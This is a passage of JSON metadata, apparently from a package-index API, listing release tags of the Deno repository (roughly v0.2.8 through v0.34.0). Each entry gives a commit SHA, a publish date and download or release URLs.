itHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d54